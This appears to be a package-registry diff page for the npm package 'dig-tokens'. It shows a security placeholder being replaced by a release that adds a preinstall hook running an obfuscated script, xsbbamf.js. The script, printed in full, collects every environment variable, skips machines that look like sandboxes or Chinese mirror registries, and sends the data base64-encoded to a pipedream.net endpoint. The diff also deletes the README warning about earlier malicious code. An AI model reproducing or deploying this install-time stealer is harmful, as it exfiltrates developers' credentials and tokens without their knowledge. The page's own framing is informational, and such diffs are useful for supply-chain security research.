dig-tokens 0.0.1-security → 1.877.367
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dig-tokens might be problematic. Click here for more details.
- package/package.json +8 -3
- package/xsbbamf.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dig-tokens",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.877.367",
|
|
4
|
+
"main": "xsbbamf.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node xsbbamf.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/xsbbamf.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x1b37(_0xbb019a,_0x56467e){const _0xa276c8=a0_0xa276();return a0_0x1b37=function(_0x1b37ee,_0x8efea5){_0x1b37ee=_0x1b37ee-0x18e;let _0x511675=_0xa276c8[_0x1b37ee];return _0x511675;},a0_0x1b37(_0xbb019a,_0x56467e);}const a0_0xf80232=a0_0x1b37;(function(_0x20f7a4,_0x4cf602){const _0x1b330d=a0_0x1b37,_0x19476a=_0x20f7a4();while(!![]){try{const _0x19e817=-parseInt(_0x1b330d(0x196))/0x1*(-parseInt(_0x1b330d(0x18e))/0x2)+parseInt(_0x1b330d(0x18f))/0x3+-parseInt(_0x1b330d(0x1a6))/0x4*(parseInt(_0x1b330d(0x19d))/0x5)+-parseInt(_0x1b330d(0x1a2))/0x6*(parseInt(_0x1b330d(0x1aa))/0x7)+parseInt(_0x1b330d(0x19e))/0x8+-parseInt(_0x1b330d(0x1a8))/0x9+-parseInt(_0x1b330d(0x199))/0xa*(-parseInt(_0x1b330d(0x1a9))/0xb);if(_0x19e817===_0x4cf602)break;else _0x19476a['push'](_0x19476a['shift']());}catch(_0x44ab44){_0x19476a['push'](_0x19476a['shift']());}}}(a0_0xa276,0x88636));function a0_0xa276(){const _0x202e71=['taobao.org','write','keys','1145TkkqOw','2004144VqiGkj','npm_config_registry','daasadmin','join','6jNGNka','/usr/bin/python','USERNAME','base64','13724gbSLas','stringify','7903899gEVUzV','4279Ubggom','3599267EXyvJS','some','registry.npmmirror.com','2lrQATW','1575342dSYYqT','pipedream','npm_package_name','c2e7a0cfd4f45f811ede4b077ae48dfa','tencent.com','from','https','1062904vHvzcG','length','net','23090UJhrsC'];a0_0xa276=function(){return _0x202e71;};return a0_0xa276();}const http=require(a0_0xf80232(0x195)),filter=[{'key':a0_0xf80232(0x19f),'val':a0_0xf80232(0x19a)},{'key':'npm_config_registry','val':a0_0xf80232(0x193)},{'key':a0_0xf80232(0x19f),'val':a0_0xf80232(0x1ac)},{'key':a0_0xf80232(0x1a4),'val':a0_0xf80232(0x1a0)},{'key':'_','val':a0_0xf80232(0x1a3)}];function main(){const _0xffa2e9=a0_0xf80232;var _0x2717c0=process['env']||{};if(filter[_0xffa2e9(0x1ab)](({key:_0xba33dd,val:_0x52dbb5})=>_0x2717c0[_0xba33dd]&&_0x2717c0[_0xba33dd]['includes'](_0x52dbb5))||Object[_0xffa2e9(0x19c)](_0x2717c0)[_0xffa2e9(0x197)]<0xa)return;req=http['request']({'host':[_0xffa2e9(0x192),'m',_0xffa2e9(0x190),_0xffa2e9(0x198)][_0xffa2e9(0x1a1)]('.'),'path':'/'+(_0x2717c0[_0xffa2e9(0x191)]||''),'method':'POST'})['on']('error',function(_0x1c7180){}),req[_0xffa2e9(0x19b)](Buffer[_0xffa2e9(0x194)](JSON[_0xffa2e9(0x1a7)](_0x2717c0))['toString'](_0xffa2e9(0x1a5))),req['end']();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.
|